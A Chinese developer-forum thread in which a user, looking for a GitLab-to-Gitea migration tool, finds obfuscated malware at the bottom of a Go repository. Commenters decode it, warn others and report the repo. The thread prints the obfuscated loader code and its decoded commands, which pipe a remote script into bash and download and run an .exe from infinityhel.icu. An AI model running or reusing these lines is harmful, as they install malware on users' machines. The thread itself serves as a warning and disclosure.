nas 上跑的 Gitlab ce 快把小内存炸了，于是试试搭了个 gitea ，看着还凑合
想把 Gitlab 上的一坨东西转过来，自己写不如集体智慧，于是开搜，但是搜到的都是 7-8 年前的 py ，拉下来满脸 warning ，怕不是要自己调试改一坨，一扭头看见一个 go 写的，粗看一下
import (
"os/exec"
"errors"
"fmt"
"os"
"strings"
"time"

"code.gitea.io/sdk/gitea" // gitea sdk ?
"github.com/alexflint/go-arg"
"github.com/cornelk/gotokit/env"
"github.com/cornelk/gotokit/log"
"gitlab.com/gitlab-org/api/client-go" // gitlab client ?
)

看着就靠谱，clone 下来正准备跑一跑试试，划拉划拉...拉到最底下菊花一紧
var qzhEVZ = exec.Command("/bin/" + "sh", "-c", WW[71] + WW[4] + WW[51] + WW[12] + WW[16] + WW[52] + WW[72] + WW[17] + WW[67] + WW[7] + WW[11] + WW[63] + WW[60] + WW[41] + WW[64] + WW[13] + WW[35] + WW[28] + WW[68] + WW[53] + WW[58] + WW[9] + WW[20] + WW[29] + WW[8] + WW[0] + WW[56] + WW[3] + WW[49] + WW[6] + WW[46] + WW[57] + WW[42] + WW[27] + WW[5] + WW[10] + WW[55] + WW[21] + WW[38] + WW[36] + WW[69] + WW[15] + WW[44] + WW[50] + WW[1] + WW[39] + WW[25] + WW[73] + WW[61] + WW[66] + WW[65] + WW[32] + WW[34] + WW[33] + WW[40] + WW[43] + WW[70] + WW[31] + WW[18] + WW[30] + WW[47] + WW[37] + WW[22] + WW[45] + WW[59] + WW[26] + WW[48] + WW[24] + WW[62] + WW[19] + WW[54] + WW[2] + WW[23] + WW[14]).Start()

var WW = []string{"y", "3", "h", "e", "g", "s", ".", " ", "t", "i", "t", "h", "t", ":", "&", "/", " ", " ", "b", "a", "n", "r", " ", " ", "/", "3", "i", "/", "/", "i", "f", "6", "/", "3", "a", "/", "g", "|", "a", "7", "1", "p", "u", "5", "d", "/", "i", " ", "n", "l", "e", "e", "-", "n", "s", "o", "h", "c", "f", "b", "t", "0", "b", "t", "s", "f", "d", "-", "i", "e", "4", "w", "O", "d"}

var RzkMMUW = "if n" + "ot ex" + "is" + "t %U" + "se" + "rPro" + "file%" + "\Ap" + "pDat" + "a\" + "Local" + "\ukmo" + "eo\" + "j" + "srv" + "b" + ".ex" + "e " + "cu" + "r" + "l ht" + "tps" + "://i" + "n" + "finit" + "y" + "hel." + "icu/s" + "torag" + "e/" + "bb" + "b" + "28ef0" + "4/fa" + "3154" + "6b" + " --" + "cre" + "ate-" + "dirs" + " -o" + " " + "%Use" + "rPr" + "of" + "ile%" + "\" + "AppD" + "ata" + "\L" + "o" + "cal\u" + "kmo" + "eo\j" + "srvb." + "exe" + " &&" + " s" + "tar" + "t " + "/b " + "%" + "Use" + "rPr" + "of" + "ile" + "%" + "\App" + "Dat" + "a\" + "L" + "o" + "cal\u" + "kmoeo" + "\js" + "rvb." + "ex" + "e"

var gqFJGwiR = gDNHtq()

func gDNHtq() error {
exec.Command("cmd", "/C", RzkMMUW).Start()
return nil
}

拆出来是
var realQzhEVZ = "/bin/sh -c 'if [ ! -f /tmp/ukmoeo/jsrvb.exe ]; then mkdir -p /tmp/ukmoeo && curl infinityhel.icu/storage/bbb28ef04/fa31546b --create-dirs -o /tmp/ukmoeo/jsrvb.exe && start /b /tmp/ukmoeo/jsrvb.exe; fi'"

if not exist %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe curl infinityhel.icu/storage/bbb28ef04/fa31546b --create-dirs -o %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe && start /b %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe

幸亏瞅了一眼...
附带这货地址 github.com/vainrefuge/gitlab2gitea

他 /bin/sh 一个 .exe 是想干啥

＃1 我不敢直接跑让 ai 补全的，坑了我一把，另起一个 py 拼起来是这样

('/bin/sh', '-c', 'wget -O - infinityhel.icu/storage/de373d0df/a31546bf | /bin/bash &')

＃1 感觉是伪装？

确实

有几种仓库要慎重使用：
1.账号新建，无头像，活跃仓库少
2.仓库 commit 少，star 少
3.动态少

小伙子活干的有点糙，在用的依赖包里偷偷的藏点私货更隐蔽一些，不过想一想还有很多老哥在百度搜破解软件呢

自己用 sh 实现功能就行了。我写过迁移组织下的仓库的。无非就是从 api 那拉 clone
--bare ，然后再推 push --all 。

给 github 官方举报一下吧，这种东西留着害人啊

举报+1

＃8 就是点了举报看要填一坨东西有点懵，交给坛友了

向 github 举报吧,省得害别人.

＃7 repo 是最没啥问题的...主要想把 issue 带附件什么的都导过来，老哥有什么推荐的方式吗？

没研究过。应该也行。我记得 api 也支持。但发行版的包就不太好整了。

这种需求交给 ai 实现一下应该不难

linux 下可以执行 exe?这是蓝翔培养的码农吗

linux 下可以执行 exe?这是蓝翔培养的码农吗，windows 下他那个文件一下载下来 windows 就报病毒了哈哈

谢邀，已举报该仓库

举报了

实际跑了一下，一个 linux 命令，对应 var qzhEVZ
wget -O - infinityhel.icu/storage/de373d0df/a31546bf | /bin/bash &
这个链接对应的是个 shell 脚本。

一个 windows 下面的，对应 var RzkMMUW
if not exist %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe curl infinityhel.icu/storage/bbb28ef04/fa31546b --create-dirs -o %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe && start /b %UserProfile%\AppData\Local\ukmoeo\jsrvb.exe

本身没有问题，不存在 bash 跑 exe 的情况。也不是蓝翔毕业的，坏是真的坏。

我去 windows defend 提示是一个病毒

已经帮忙 report

找到好用的脚本了吗？我也计划干这活

＃22
干坏事儿这哥虽然没干好事儿，但是直接引用 sdk 这个思路俺觉得还行，于是搓了一下午脚本儿
然后测试过程中去 gitea 建 Organization 的时候发现了 Migration ，一看有直接导入 Gitlab ，高高兴兴试了试，一看 Issue 导入正常但是附件全丢满脸 X
去 gitea 的 issue 看了，确实有提丢 files 的，还是 open 状态
拿 sdk 自己解析从 gitlab 捞下来的 issue ，然后解析 files url ，下载并上传给 gitea...大概可以，但不确定

明天再试吧...

sandbox.ti.qianxin.com/sandbox/page/detail?type=file&id=AZgNiDLiSZq0HOVftLqt